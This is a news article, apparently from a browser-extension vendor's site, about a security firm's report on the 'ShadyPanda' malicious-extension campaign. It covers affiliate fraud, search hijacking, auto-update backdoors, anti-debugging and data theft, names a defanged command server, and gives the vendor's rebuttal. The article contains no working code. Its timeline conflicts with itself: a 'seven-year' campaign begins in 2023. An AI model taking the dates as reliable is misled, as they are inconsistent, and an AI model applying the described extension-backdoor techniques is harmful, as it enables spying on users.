4.3 Million Browsers Infected: Uncovering ShadyPanda's 7-Year Malware Campaign
Security firm Koi.ai has disclosed ShadyPanda's 7-year malware campaign, infecting over 4.3 million Chrome and Edge users, involving well-known extensions like Clean Master.
Summary: Recently, security firm Koi.ai released a bombshell report exposing a threat group named ShadyPanda. Over the past 7 years, this group has infected more than 4.3 million users by distributing malicious browser extensions through Chrome and Edge stores. The report indicates that multiple well-known extensions, including Clean Master, have been used as spyware to collect sensitive data such as user browsing history, search records, and even cookies.
7 Years of Planning, 4 Phases
According to Koi.ai researcher Tuval Admoni, ShadyPanda's attack activities can be traced back 7 years, with strategies continuously evolving from simple ad fraud to comprehensive browser monitoring.
Phase 1: The "Wallpaper and Productivity Tools" Scam (2023)
Initially, ShadyPanda released 145 extensions disguised as wallpaper or productivity tools (mainly in the Edge store). These extensions profited by injecting affiliate codes (Affiliate Fraud). When users visited shopping sites like Amazon and eBay, the extensions would quietly replace links to earn commissions. Although not technically sophisticated, this gave attackers a taste of success: users trust extensions with high install counts, and app store reviews primarily focus on initial submissions.
Phase 2: Search Hijacking (Early 2024)
Subsequently, attackers became bolder. Certain new tab extensions began hijacking users' search traffic, redirecting it to known hijacking sites like trovi.com. More seriously, they started collecting users' search queries (even real-time input before users pressed Enter) and cookies from specific domains, sending the data to attackers' servers.
Phase 3: The Long Game
This phase was the most deceptive. ShadyPanda acquired or developed 5 extensions including Clean Master, allowing them to operate legitimately for years, accumulating hundreds of thousands of users, and even earning "Featured" and "Verified" badges from stores.
It wasn't until mid-2024 that attackers pushed malicious code through automatic update mechanisms. These extensions were implanted with Remote Code Execution (RCE) backdoors, downloading and executing arbitrary JavaScript code from control servers every hour. This means attackers could change extension behavior at any time, transitioning from monitoring to ransomware or credential theft.
Phase 4: The Spyware Empire (4 Million+ Users)
This is currently the most impactful phase. The report indicates that 5 other extensions operated by ShadyPanda in the Edge store (including extensions with millions of users) are actually powerful spyware.
These extensions are accused of collecting and exfiltrating the following data:
- Complete browsing history: Every URL visited.
- Search queries: Recording every user search.
- Page interactions: Mouse click coordinates, dwell time, etc.
- Browser fingerprints: Screen resolution, User Agent, timezone, etc.
- Cookies and storage data: Having permissions to read all cookies and local storage.
According to reports, this data was sent to servers located in China as well as Google Analytics.
User Community Response
This incident has sparked strong reactions across major tech communities. Many long-term users expressed shock and anger, while others began searching for alternatives.
In the Linux.do community, users expressed concerns about data breaches:
"I spent so long customizing everything, and now it's all gone! Malicious plugins I**" —— Acheron "Got hit, don't know what exactly was stolen" —— hjie
On V2EX, users also posted:
"Can't laugh about this, been using a new tab page for years, suspected to be poisoned"
Users in the NodeLoc community expressed relief at not being affected and reminded each other to stay vigilant about security.
These authentic voices reflect users' concern for privacy and security, as well as disappointment at being "backstabbed" by tools they once trusted.
Technical Details and Harm
The report provides detailed analysis of ShadyPanda's technical methods:
- RCE Backdoor: Infected extensions regularly check
api.extensionplay[.]com, downloading and executing obfuscated JavaScript code. - Anti-Analysis: Malicious code detects whether developer tools are open, and if debugging behavior is detected, it stops malicious activities to evade analysis.
- Man-in-the-Middle Attack Capability: Through Service Workers, malicious extensions can intercept and modify network traffic, even injecting malicious content into HTTPS connections.
Official Response and Controversy
In response to Koi.ai's allegations, the WeTab and Infinity teams quickly released response statements (see Official Statement).
The teams stated:
- Clean Master Chrome version was sold to a third party long ago, and subsequent malicious updates are unrelated to the original team.
- WeTab and Infinity are independently operated products with code different from Clean Master, containing no backdoors or malicious monitoring.
- Extensions were removed because they used the same developer account as Clean Master and were "guilty by association," not because the products themselves contained malicious code.
- Collected data is only used for basic product functions (such as syncing, statistics), does not involve privacy, and the teams have invited third-party organizations to conduct security audits.
Reference sources: Koi.ai Blog, BleepingComputer, V2EX Discussion
More Posts
WeTab & Infinity Team Responds to "Poisoning" Allegations: Clean Master Was Sold Long Ago, Core Products Are Safe
The WeTab & Infinity team released a statement clarifying that the Clean Master Chrome version was sold long ago, and the malicious updates are unrelated to the original team. WeTab and Infinity are independently operated with no backdoors found.
8 Best Chrome Session Manager Extensions in 2026
Too many windows, lost context, and a browser that slows to a crawl. This guide curates 8 Chrome session manager extensions for 2026, covering one click session saves, recovery, workspace switching, reminder based revisit flows, and beautiful new tab hubs so you can resume work faster and keep memory in check.
10 Best Logo Websites in 2026
Here is a handpicked list of the 10 best logo websites in 2026, covering makers, testers, downloads, and inspiration so you can create, refine, and ship a logo without wasted time.
Download Now Chrome